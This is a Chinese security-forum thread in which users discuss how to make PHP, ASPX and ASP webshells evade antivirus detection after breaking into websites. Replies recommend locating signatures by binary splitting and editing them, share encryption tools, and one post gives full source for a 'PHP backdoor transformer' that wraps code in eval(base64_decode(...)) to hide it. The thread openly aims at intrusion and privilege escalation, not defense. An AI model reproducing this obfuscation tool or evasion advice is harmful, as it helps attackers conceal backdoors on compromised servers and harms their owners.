Board logo

标题: [讨论]请问PHP ASPX ASP木马如何更好的免杀 [打印本页]

作者: richy    时间: 2008-7-20 23:21     标题: [讨论]请问PHP ASPX ASP木马如何更好的免杀

[讨论]请问PHP ASPX ASP木马如何更好的免杀
议题作者:zhuixun2006
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

请问PHP,ASPX,ASP木马如何更好的免杀。
我试过许多工具,对ASP木马加密效果的确很不错。
我指的是海洋,和老兵,对于其他ASP马,我试过一个。加密之后就不能用了,但是可以反汇编。
而PHP,ASPX我实在不知道如何下手,网上也有工具,但是加密之后,就不可以用了。
所以每次入侵之后,想传PHP,ASPX木马,获得更高权限,都被杀毒软件给查杀。
我很是郁闷,手工免杀,实在是不知道如何是好,请高手支招。http://Zhuixun.A.gg 我的BOLG

帖子60 精华0 积分116 阅读权限40 性别男 在线时间38 小时 注册时间2006-5-6 最后登录2006-10-21 查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?

ttfct
荣誉会员

作者: pennyhu    时间: 2008-7-20 23:21

如果你懂代码的话,改一改就可以过了TTFCT http://WWW.TTFCT.COM

帖子279 精华4 积分4132 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-17 查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

zhuixun2006
晶莹剔透§烈日灼然
作者: 鸥飞007    时间: 2008-7-20 23:21

引用:
这里是引用第[1 楼]的zxzgcn于2006-08-11 11:05发表的:
如果你懂代码的话,改一改就可以过了
请举例 改哪些代码呢。?http://Zhuixun.A.gg 我的BOLG
帖子60 精华0 积分116 阅读权限40 性别男 在线时间38 小时 注册时间2006-5-6 最后登录2006-10-21 查看详细资料引用 报告 回复 TOP 赚更多的钱

ttfct
荣誉会员

作者: shirley    时间: 2008-7-20 23:21

用杀软来测试,拆半分析法吧
它要杀哪个,你就改它,很容易过的TTFCT http://WWW.TTFCT.COM

帖子279 精华4 积分4132 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-17 查看详细资料引用 报告 回复 TOP

神無月
晶莹剔透§烈日灼然
作者: 大圣    时间: 2008-7-20 23:21

PHP加密的好象有  好象记得是冰狐浪子的作品  是一个PHP文件来的
我用过他加密 可以免杀 可是PHP马体积会变大  
ASPX 的 曾经在网上见过ASP。NET加密工具 不知道是真是假。
帖子124 精华0 积分313 阅读权限40 性别男 在线时间37 小时 注册时间2006-4-22 最后登录2008-6-9 查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

杀虫剂
晶莹剔透§烈日灼然
作者: bobby    时间: 2008-7-20 23:21

这问题叫虫虫回答吧。他对加解密有研究。 [s:71] 或者叫他写个工具 [s:67]  [s:70]黎叔很生气

帖子70 精华0 积分161 阅读权限40 性别男 在线时间84 小时 注册时间2006-4-27 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

zhuixun2006
晶莹剔透§烈日灼然
作者: BG7LHT    时间: 2008-7-20 23:21

请问楼上说的冰狐的工具是不是这个?
我没试过这个,,这个也可以加密PHP吗?
附件
{DEA8E67E-2362-4A19-947D-CB8BEC8A7C31}0.jpg (37 KB)
2006-8-11 13:40
http://Zhuixun.A.gg 我的BOLG
帖子60 精华0 积分116 阅读权限40 性别男 在线时间38 小时 注册时间2006-5-6 最后登录2006-10-21 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

神無月
晶莹剔透§烈日灼然
作者: ocarlee    时间: 2008-7-20 23:21

JSCRIPT 应该不可以的吧  ? 我说的那个PHP加密是变形加密的. 那个东东是火狐的 记错了 呵呵
<?php
/*
=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=
+                 our team [F.S.T]                       +
+          website : http://www.wrsky.com                    +
+      the tool change the code of php base64ed!!                +
=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=1=
*/
?>
<HTML><HEAD><TITLE>火狐php后门变形工具</TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>A {
  COLOR: #000000; TEXT-DECORATION: none
}
A:hover {
  TEXT-DECORATION: underline
}
BODY {
  FONT-SIZE: 12px; SCROLLBAR-ARROW-COLOR: #cc0000; SCROLLBAR-BASE-COLOR: #f8f8f8; BACKGROUND-COLOR: #999999
}
TABLE {
  FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana
}
TEXTAREA {
  FONT-WEIGHT: normal; FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana; BACKGROUND-COLOR: #f8f8f8
}
INPUT {
  FONT-WEIGHT: normal; FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana; BACKGROUND-COLOR: #f8f8f8
}
OBJECT {
  FONT-WEIGHT: normal; FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana; BACKGROUND-COLOR: #f8f8f8
}
SELECT {
  FONT-WEIGHT: normal; FONT-SIZE: 11px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana; BACKGROUND-COLOR: #f8f8f8
}
.nav {
  FONT-WEIGHT: bold; FONT-SIZE: 12px; FONT-FAMILY: Tahoma, Verdana
}
.header {
  FONT-WEIGHT: bold; FONT-SIZE: 11px; COLOR: #ffffff; FONT-FAMILY: Tahoma, Verdana; BACKGROUND-COLOR: #cc0000
}
.header A {
  COLOR: #ffffff; TEXT-DECORATION: none
}
.category {
  FONT-SIZE: 11px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana; BACKGROUND-COLOR: #efefef
}
.tableborder {
  BORDER-RIGHT: #cc0000 1px solid; BORDER-TOP: #cc0000 1px solid; BACKGROUND: #d6e0ef; BORDER-LEFT: #cc0000 1px solid; BORDER-BOTTOM: #cc0000 1px solid
}
.singleborder {
  PADDING-RIGHT: 0px; PADDING-LEFT: 0px; FONT-SIZE: 0px; PADDING-BOTTOM: 0px; LINE-HEIGHT: 1px; PADDING-TOP: 0px; BACKGROUND-COLOR: #f8f8f8
}
.smalltxt {
  FONT-SIZE: 11px; FONT-FAMILY: Tahoma, Verdana
}
.mediumtxt {
  FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana
}
.bold {
  FONT-WEIGHT: bold
}
.multi {
  FONT-SIZE: 11px; COLOR: #000000; FONT-FAMILY: Tahoma, Verdana
}
.navtd {
  FONT-SIZE: 12px; COLOR: #ffffff; FONT-FAMILY: Tahoma, Verdana; TEXT-DECORATION: none
}
.tableborder {
  BORDER-RIGHT: #cc0000 1px solid; BORDER-TOP: #cc0000 1px solid; BACKGROUND: #d6e0ef; BORDER-LEFT: #cc0000 1px solid; BORDER-BOTTOM: #cc0000 1px solid
}
</STYLE>

<META content="MSHTML 6.00.2800.1476" name=GENERATOR></HEAD>
<BODY bgColor=#999999>
<CENTER>
<DIV align=center>
<FORM name=FORM action="" method=post
encType=multipart/form-data>
<TABLE cellSpacing=1 cellPadding=0 width="40%" bgColor=#cc3300 border=0>
  <TBODY>
  <TR>
   <TD colSpan=2 height=30>
    <DIV align=center><STRONG><FONT
    color=#ffffff>火狐php后门变形工具</FONT></STRONG></DIV></TD></TR>
  <TR bgColor=#cccccc>
   <TD vAlign=top height=120><TEXTAREA name=code rows=16 cols=90>
<?php
if (get_magic_quotes_gpc()) {
   $_GET = stripslashes_array($_GET);
  $_POST = stripslashes_array($_POST);
}
  // 去掉转义字符
  function stripslashes_array(&$array) {
    while(list($key,$var) = each($array)) {
      if ($key != &#39;argc&#39; && $key != &#39;argv&#39; && (strtoupper($key) != $key || &#39;&#39;.intval($key) == "$key")) {
        if (is_string($var)) {
          $array[$key] = stripslashes($var);
        }
        if (is_array($var))  {
          $array[$key] = stripslashes_array($var);
        }
      }
    }
    return $array;
  }

if (empty($_POST[&#39;code&#39;])) {
echo"/*\n";
echo "请写入你要转换的代码,去掉程序的开头的<?php和结尾的?&gt!";
echo"\n";
echo "另外提交后请耐心等待,不要重复提交或刷新,会出错的,^_^";
echo"下面给个示范\n*/\n";
echo&#39;phpinfo();&#39;;
}else{
echo"<?php";
echo" eval(base64_decode(&#39;";
echo base64_encode($_POST[&#39;code&#39;]);
echo"&#39;));?>";
}
?>
</TEXTAREA>
  <TR align=middle bgColor=#cccccc>
   <TD colSpan=2 height=32><INPUT type=submit value=开始罪恶的变形></TD></TR>
  <TR align=middle>
   <TD colSpan=2 height=32>Copyright(c)<STRONG><FONT color=#ffffff> <A
    href="http://www.wrsky.com/" target=_blank>火狐原创</A></FONT></STRONG>
    Power By <STRONG><FONT color=#ffffff>Saiy
  </FONT></STRONG></TD></TR></TBODY></TABLE></FORM></DIV></CENTER></BODY></HTML>


找个支持PHP的空间传上去再加密.. 效果不错.
帖子124 精华0 积分313 阅读权限40 性别男 在线时间37 小时 注册时间2006-4-22 最后登录2008-6-9 查看详细资料引用 报告 回复 TOP

zmdjf
晶莹剔透§烈日灼然
作者: xiezeshen66    时间: 2008-7-20 23:21

大小写互换只对nav有效吧。。咖啡照样杀。
帖子7 精华0 积分24 阅读权限40 在线时间6 小时 注册时间2005-5-7 最后登录2006-8-11 查看详细资料引用 报告 回复 TOP

icexiaoye
荣誉会员

作者: gaofeng    时间: 2008-7-20 23:21

[s:75] 打个广告~
用我做的网马生成器生成的猪3和记忆的ASP木马能过
呵呵,开个玩笑拉
其实无论是脚本马还是EXE木马,想要真正免杀,对语言一定要掌握,掌握到及至,就是自己写,这样什么杀毒软件都拿你没办法
要是达不到这水平,比如对EXE木马改特征码的话,想弄好,一定要对汇编有一定了解,毕竟有些地方胡改是不行的
同例,要改ASP,ASPX马,最好也要对ASP,ASP。NET有一定了解
在特征码处改成自己的语言又不影响程序运行

汗~~说了半天感觉没帮上你~~~ [s:58]玩世不恭彼此 ⌒ ˇ互相鼓励信任 認眞體驗每⒈兲.!﹏演藝⒉.個亾啲莞鎂傳奇( [淇]儭滗.

帖子728 精华4 积分5182 阅读权限100 性别男 在线时间255 小时 注册时间2006-8-7 最后登录2008-7-14 查看个人网站
查看详细资料引用 报告 回复 TOP

ttfct
荣誉会员

作者: 超越改    时间: 2008-7-20 23:21

哎,火狐php后门变形工具===>base64_decode函数加密TTFCT http://WWW.TTFCT.COM

帖子279 精华4 积分4132 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-17 查看详细资料引用 报告 回复 TOP

fhod
运维管理组

作者: fjx16888    时间: 2008-7-20 23:21

貌似偶这里有一个很牛的加密工具
现在在公司
等回家了传上来份..有的人或许用过或见过.

帖子899 精华16 积分6857 阅读权限150 性别男 在线时间534 小时 注册时间2004-12-6 最后登录2008-7-18 查看个人网站
查看详细资料引用 报告 回复 TOP

ttfct
荣誉会员

作者: houyongwang_5    时间: 2008-7-20 23:21

楼上的,工作了? 你88年的啊TTFCT http://WWW.TTFCT.COM

帖子279 精华4 积分4132 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-17 查看详细资料引用 报告 回复 TOP

zhuixun2006
晶莹剔透§烈日灼然
作者: 小鱼儿    时间: 2008-7-20 23:21

引用:
这里是引用第[12 楼]的fhod于2006-08-13 13:38发表的:
貌似偶这里有一个很牛的加密工具
现在在公司
等回家了传上来份..有的人或许用过或见过.
羡慕你们都工作了啊,我都还在读高一..苦苦啊...

希望早点把工具发出来哦...谢谢了.http://Zhuixun.A.gg 我的BOLG
帖子60 精华0 积分116 阅读权限40 性别男 在线时间38 小时 注册时间2006-5-6 最后登录2006-10-21 查看详细资料引用 报告 回复 TOP

fhod
运维管理组

作者: sxp    时间: 2008-7-20 23:21

引用:
这里是引用第[13 楼]的zxzgcn于2006-08-13 15:30发表的:
楼上的,工作了? 你88年的啊
刚应聘上的..一家大商场的系统管理员..

刚到家..把工具上传下....有需要的人来down
附件
051231jiami.rar (18 KB)
2006-8-13 23:00, 下载次数: 569
加密工具

帖子899 精华16 积分6857 阅读权限150 性别男 在线时间534 小时 注册时间2004-12-6 最后登录2008-7-18 查看个人网站
查看详细资料引用 报告 回复 TOP

juey
荣誉会员

作者: 东视人    时间: 2008-7-20 23:21

楼上的哥哥,那工具不能用,出错

图传不上来努力就有回报别和我说技术............因为我不懂什么叫技术....
帖子305 精华4 积分3762 阅读权限100 在线时间446 小时 注册时间2005-10-28 最后登录2008-5-17 查看详细资料引用 报告 回复 TOP

fhod
运维管理组

作者: 盈盈    时间: 2008-7-20 23:21

程序是VB写的
需要运行库
去下把.

帖子899 精华16 积分6857 阅读权限150 性别男 在线时间534 小时 注册时间2004-12-6 最后登录2008-7-18 查看个人网站
查看详细资料引用 报告 回复 TOP

zhuixun2006
晶莹剔透§烈日灼然
作者: shirley    时间: 2008-7-20 23:21

额。。。。这个工具不就是火狐的黑客伟写的吗?他也能加密PHP吗?http://Zhuixun.A.gg 我的BOLG
帖子60 精华0 积分116 阅读权限40 性别男 在线时间38 小时 注册时间2006-5-6 最后登录2006-10-21 查看详细资料引用 报告 回复 TOP

xiaocool
晶莹剔透§烈日灼然
作者: SUNNY仔    时间: 2008-7-20 23:21

引用:
这里是引用第[3 楼]的zxzgcn于2006-08-11 11:15发表的:
用杀软来测试,拆半分析法吧
它要杀哪个,你就改它,很容易过的
象海洋的,他就杀开始那段的ID数字,这怎么改?
帖子162 精华2 积分431 阅读权限40 在线时间75 小时 注册时间2005-8-4 最后登录2008-6-9 查看详细资料引用 报告 回复 TOP

tale007
晶莹剔透§烈日灼然
作者: niufen    时间: 2008-7-20 23:21

哪位有aspx加密的木马就直接上传个,怎么都找不工具加密郁闷
帖子41 精华0 积分62 阅读权限40 性别男 在线时间24 小时 注册时间2006-6-20 最后登录2008-5-4 查看详细资料引用 报告 回复 TOP

hzy0110
晶莹剔透§烈日灼然
作者: LOVE    时间: 2008-7-20 23:21

完蛋了。。看来还是需要精通下语言才能啊 。。。。。哎。。靠工具始终是不行的
帖子9 精华0 积分25 阅读权限40 性别男 在线时间8 小时 注册时间2006-8-10 最后登录2008-6-5 查看详细资料引用 报告 回复 TOP

ttfct
荣誉会员

作者: checkhere    时间: 2008-7-20 23:21

引用:
象海洋的,他就杀开始那段的ID数字,这怎么改?
直接删除TTFCT http://WWW.TTFCT.COM

帖子279 精华4 积分4132 阅读权限100 性别男 在线时间111 小时 注册时间2006-2-13 最后登录2008-7-17 查看详细资料引用 报告 回复 TOP

xindong
晶莹剔透§烈日灼然
作者: 皓新    时间: 2008-7-20 23:21

引用:
这里是引用第[15 楼]的fhod于2006-08-13 23:00发表的:


刚应聘上的..一家大商场的系统管理员..

刚到家..把工具上传下....有需要的人来down
我也不想去找库了,也不知能不能加密php,对于php我是用辐射鱼的方法加密,效果还不错,如果配上火狐的加密算法,那样就更爽了,今天正好用这些方法将自己手头上的php马都加一一遍,全部免杀!
帖子25 精华0 积分84 阅读权限40 在线时间9 小时 注册时间2005-8-8 最后登录2006-10-3 查看个人网站
查看详细资料引用 报告 回复 TOP

remax
晶莹剔透§烈日灼然
作者: 揸拖拉机入西藏    时间: 2008-7-20 23:21

恩,一半一半的拆分定位是最快的,现在的杀毒貌似只认代码,像这些脚本语言很好改的。[kav6.0貌似认了一点点行为,不知道以后的日子怎么过了。。]20字节够写什么?

帖子325 精华2 积分911 阅读权限50 在线时间79 小时 注册时间2005-10-25 最后登录2008-7-13 查看个人网站
查看详细资料引用 报告 回复 TOP

可酷可乐
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2